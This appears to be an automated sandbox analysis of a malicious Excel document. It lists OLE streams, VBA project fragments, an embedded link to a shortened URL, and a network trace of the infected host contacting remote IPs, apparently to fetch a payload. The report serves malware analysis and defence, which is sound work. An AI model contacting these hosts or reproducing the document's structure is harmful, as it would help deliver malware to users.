                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                              General
                              Stream Path:MBD0081AAF9/Package
                              CLSID:
                              File Type:Microsoft Excel 2007+
                              Stream Size:94938
                              Entropy:7.802143573216423
                              Base64 Encoded:True
                              Data ASCII:P K . . . . . . . . . . ! . . M v j . . . 8 . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                              Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 19 4d 76 6a ba 01 00 00 38 07 00 00 13 00 d9 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d5 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              General
                              Stream Path:MBD0081AAFA/\x1CompObj
                              CLSID:
                              File Type:data
                              Stream Size:114
                              Entropy:4.25248375192737
                              Base64 Encoded:True
                              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                              General
                              Stream Path:MBD0081AAFA/\x5DocumentSummaryInformation
                              CLSID:
                              File Type:data
                              Stream Size:244
                              Entropy:2.701136490257069
                              Base64 Encoded:False
                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                              General
                              Stream Path:MBD0081AAFA/\x5SummaryInformation
                              CLSID:
                              File Type:data
                              Stream Size:220
                              Entropy:3.3813251513223976
                              Base64 Encoded:False
                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . . . ^ . . . . . . . . .
                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
                              General
                              Stream Path:MBD0081AAFA/MBD000673C0/\x1CompObj
                              CLSID:
                              File Type:data
                              Stream Size:114
                              Entropy:4.219515110876372
                              Base64 Encoded:False
                              Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                              General
                              Stream Path:MBD0081AAFA/MBD000673C0/Package
                              CLSID:
                              File Type:Microsoft Excel 2007+
                              Stream Size:17987
                              Entropy:7.459551056433264
                              Base64 Encoded:True
                              Data ASCII:P K . . . . . . . . . . ! . . 4 v . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                              Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 c8 a3 cd 34 76 01 00 00 04 05 00 00 13 00 dd 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d9 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              General
                              Stream Path:MBD0081AAFA/MBD00083EA7/\x1CompObj
                              CLSID:
                              File Type:data
                              Stream Size:114
                              Entropy:4.219515110876372
                              Base64 Encoded:False
                              Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                              General
                              Stream Path:MBD0081AAFA/MBD00083EA7/Package
                              CLSID:
                              File Type:Microsoft Excel 2007+
                              Stream Size:14238
                              Entropy:7.30552548787177
                              Base64 Encoded:True
                              Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                              Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              General
                              Stream Path:MBD0081AAFA/MBD000846C9/\x1CompObj
                              CLSID:
                              File Type:data
                              Stream Size:114
                              Entropy:4.25248375192737
                              Base64 Encoded:True
                              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                              General
                              Stream Path:MBD0081AAFA/MBD000846C9/\x5DocumentSummaryInformation
                              CLSID:
                              File Type:data
                              Stream Size:708
                              Entropy:3.6235698530352805
                              Base64 Encoded:True
                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 20 02 00 00 dc 01 00 00 14 00 00 00 01 00 00 00 a8 00 00 00 02 00 00 00 b0 00 00 00 03 00 00 00 bc 00 00 00 0e 00 00 00 c8 00 00 00 0f 00 00 00 d4 00 00 00 04 00 00 00 e0 00 00 00 05 00 00 00
                              General
                              Stream Path:MBD0081AAFA/MBD000846C9/\x5SummaryInformation
                              CLSID:
                              File Type:data
                              Stream Size:372
                              Entropy:2.913345911478729
                              Base64 Encoded:True
                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v i v i e n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 1
                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 44 01 00 00 10 00 00 00 01 00 00 00 88 00 00 00 02 00 00 00 90 00 00 00 03 00 00 00 9c 00 00 00 04 00 00 00 a8 00 00 00 05 00 00 00 b8 00 00 00 06 00 00 00 c4 00 00 00 07 00 00 00 d0 00 00 00 08 00 00 00 dc 00 00 00 09 00 00 00 ec 00 00 00
                              General
                              Stream Path:MBD0081AAFA/MBD000846C9/Workbook
                              CLSID:
                              File Type:Applesoft BASIC program data, first line number 16
                              Stream Size:97808
                              Entropy:7.365095307579232
                              Base64 Encoded:True
                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . .
                              Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                              General
                              Stream Path:MBD0081AAFA/MBD0018D4CE/\x1Ole
                              CLSID:
                              File Type:data
                              Stream Size:20
                              Entropy:0.5689955935892812
                              Base64 Encoded:False
                              Data ASCII:. . . . . . . . . . . . . . . . . . . .
                              Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              General
                              Stream Path:MBD0081AAFA/MBD0018D4CE/\x3ObjInfo
                              CLSID:
                              File Type:data
                              Stream Size:4
                              Entropy:0.8112781244591328
                              Base64 Encoded:False
                              Data ASCII:. . . .
                              Data Raw:00 00 03 00
                              General
                              Stream Path:MBD0081AAFA/MBD0018D4CE/Contents
                              CLSID:
                              File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                              Stream Size:197671
                              Entropy:6.989042939766534
                              Base64 Encoded:True
                              Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                              Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              General
                              Stream Path:MBD0081AAFA/Workbook
                              CLSID:
                              File Type:Applesoft BASIC program data, first line number 16
                              Stream Size:386813
                              Entropy:7.815032759709734
                              Base64 Encoded:True
                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . ` < x - 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . .
                              Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                              General
                              Stream Path:MBD0081AAFB/\x1Ole
                              CLSID:
                              File Type:data
                              Stream Size:780
                              Entropy:4.598662855485871
                              Base64 Encoded:False
                              Data ASCII:. . . . ^ 1 Q . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . s . . . d . e . e . m . o . s . . . c . o . m . / . f . N . s . C . o . 8 . x . A . ? . & . p . r . i . e . s . t . h . o . o . d . = . t . a . m . e . & . q . u . o . t . a . t . i . o . n . = . p . r . e . t . t . y . & . m . a . l . l . . . ] ~ k c p . . X . . + . } i ! : n . . . Z 3 B . . . . . . . . . . . . . . . . . . . d . F . f . f . T . 8 . G . S . p . S . 8 . R . v . F . f . W . 5 . c . P . G . 1 . C .
                              Data Raw:01 00 00 02 d5 5e 9a 31 8b 90 84 51 00 00 00 00 00 00 00 00 00 00 00 00 c6 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b c2 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 73 00 2e 00 64 00 65 00 65 00 6d 00 6f 00 73 00 2e 00 63 00 6f 00 6d 00 2f 00 66 00 4e 00 73 00 43 00 6f 00 38 00 78 00 41 00 3f 00 26 00 70 00 72 00 69 00 65 00 73 00 74 00 68 00 6f 00 6f 00
                              General
                              Stream Path:Workbook
                              CLSID:
                              File Type:Applesoft BASIC program data, first line number 16
                              Stream Size:434937
                              Entropy:7.999030413420103
                              Base64 Encoded:True
                              Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . E x @ ? [ [ H . \\ K . . N m r . { . . G . w ~ , S I . . . . . . . < ) . . . \\ . p . ? . i 8 . c - t O b . . R ` ? . . 4 ~ O v } Z . . . m B U . 7 : . U . . L # h L . . . U . 3 . . S . . ) ' y Y _ F h E . O P - . B . . . v a . . . < . . . = . . . a % . m . . . . } y + q . . . . . . . . j . . . . R . . . . . . . B , . . . = . . . . . S . < E A . ) ! @ . . . $ . . . . . " . . . v . . . . . . . . . . . . 1 . . . v . 7 . U . 7 i ] . } . . , H 1 . . . | = e A
                              Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 b4 aa b1 45 78 40 88 de 3f 87 5b 5b f2 bb 48 df a6 bb 5c ac ab 4b 89 03 0d e4 4e 6d 72 0a 8b 7b cd a4 01 f4 bf c7 47 f5 e9 06 77 c8 7e 2c 53 49 e1 00 02 00 b0 04 c1 00 02 00 3c 29 e2 00 00 00 5c 00 70 00 a0 3f da e8 1e 69 38 17 63 2d 74 4f f4 62 b5 08 a9 85 1d 52 60 e1 e5 e4 b6 3f 0b 14 90 de
                              General
                              Stream Path:_VBA_PROJECT_CUR/PROJECT
                              CLSID:
                              File Type:ASCII text, with CRLF line terminators
                              Stream Size:525
                              Entropy:5.210919218372773
                              Base64 Encoded:True
                              Data ASCII:I D = " { 5 1 B 1 7 F E 7 - 0 A 2 E - 4 2 F 4 - A 7 E E - C 0 D 6 6 B A 6 B 4 D 8 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " F 2 F 0 E 4 2 7 0 1 2 B 0 1 2 B 0
                              Data Raw:49 44 3d 22 7b 35 31 42 31 37 46 45 37 2d 30 41 32 45 2d 34 32 46 34 2d 41 37 45 45 2d 43 30 44 36 36 42 41 36 42 34 44 38 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                              General
                              Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                              CLSID:
                              File Type:data
                              Stream Size:104
                              Entropy:3.0488640812019017
                              Base64 Encoded:False
                              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                              Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                              General
                              Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                              CLSID:
                              File Type:data
                              Stream Size:2644
                              Entropy:3.978508048167349
                              Base64 Encoded:False
                              Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                              Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                              General
                              Stream Path:_VBA_PROJECT_CUR/VBA/dir
                              CLSID:
                              File Type:data
                              Stream Size:553
                              Entropy:6.3759364757172685
                              Base64 Encoded:True
                              Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E .
                              Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 fc ad 9a 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                              TimestampSource PortDest PortSource IPDest IP
                              Jan 16, 2025 08:31:32.458337069 CET5909453192.168.2.251.1.1.1
                              Jan 16, 2025 08:31:32.463377953 CET53590941.1.1.1192.168.2.25
                              Jan 16, 2025 08:31:32.463495016 CET5909453192.168.2.251.1.1.1
                              Jan 16, 2025 08:31:32.464835882 CET5909453192.168.2.251.1.1.1
                              Jan 16, 2025 08:31:32.469783068 CET53590941.1.1.1192.168.2.25
                              Jan 16, 2025 08:31:32.916915894 CET53590941.1.1.1192.168.2.25
                              Jan 16, 2025 08:31:32.926949978 CET5909453192.168.2.251.1.1.1
                              Jan 16, 2025 08:31:32.931940079 CET53590941.1.1.1192.168.2.25
                              Jan 16, 2025 08:31:32.932379961 CET5909453192.168.2.251.1.1.1
                              Jan 16, 2025 08:32:20.917639971 CET59104443192.168.2.2514.103.79.10
                              Jan 16, 2025 08:32:20.917682886 CET4435910414.103.79.10192.168.2.25
                              Jan 16, 2025 08:32:20.917771101 CET59104443192.168.2.2514.103.79.10
                              Jan 16, 2025 08:32:20.919060946 CET59104443192.168.2.2514.103.79.10
                              Jan 16, 2025 08:32:20.919076920 CET4435910414.103.79.10192.168.2.25
                              Jan 16, 2025 08:32:24.841742992 CET4435910414.103.79.10192.168.2.25
                              Jan 16, 2025 08:32:24.841898918 CET59104443192.168.2.2514.103.79.10
                              Jan 16, 2025 08:32:24.843364000 CET59104443192.168.2.2514.103.79.10
                              Jan 16, 2025 08:32:24.843369007 CET4435910414.103.79.10192.168.2.25
                              Jan 16, 2025 08:32:24.844516993 CET4435910414.103.79.10192.168.2.25
                              Jan 16, 2025 08:32:24.844593048 CET59104443192.168.2.2514.103.79.10
                              Jan 16, 2025 08:32:24.846231937 CET59104443192.168.2.2514.103.79.10
                              Jan 16, 2025 08:32:24.846303940 CET4435910414.103.79.10192.168.2.25
                              Jan 16, 2025 08:32:24.846353054 CET59104443192.168.2.2514.103.79.10
                              Jan 16, 2025 08:32:24.846359968 CET4435910414.103.79.10192.168.2.25
                              Jan 16, 2025 08:32:24.846398115 CET59104443192.168.2.2514.103.79.10
                              Jan 16, 2025 08:32:24.848367929 CET59104443192.168.2.2514.103.79.10
                              Jan 16, 2025 08:32:24.891325951 CET4435910414.103.79.10192.168.2.25
                              Jan 16, 2025 08:32:25.404459953 CET4435910414.103.79.10192.168.2.25
                              Jan 16, 2025 08:32:25.404558897 CET4435910414.103.79.10192.168.2.25
                              Jan 16, 2025 08:32:25.404560089 CET59104443192.168.2.2514.103.79.10
                              Jan 16, 2025 08:32:25.404613018 CET59104443192.168.2.2514.103.79.10
                              Jan 16, 2025 08:32:25.407778025 CET59104443192.168.2.2514.103.79.10
                              Jan 16, 2025 08:32:25.407798052 CET4435910414.103.79.10192.168.2.25
                              Jan 16, 2025 08:32:25.409281015 CET5910580192.168.2.25172.245.119.74
                              Jan 16, 2025 08:32:25.414264917 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.414361000 CET5910580192.168.2.25172.245.119.74
                              Jan 16, 2025 08:32:25.414491892 CET5910580192.168.2.25172.245.119.74
                              Jan 16, 2025 08:32:25.419306040 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.901004076 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.901022911 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.901034117 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.901043892 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.901051044 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.901056051 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.901070118 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.901081085 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.901094913 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.901104927 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.901269913 CET5910580192.168.2.25172.245.119.74
                              Jan 16, 2025 08:32:25.901269913 CET5910580192.168.2.25172.245.119.74
                              Jan 16, 2025 08:32:25.906265020 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.906282902 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.906295061 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.906385899 CET5910580192.168.2.25172.245.119.74
                              Jan 16, 2025 08:32:25.989299059 CET8059105172.245.119.74192.168.2.25
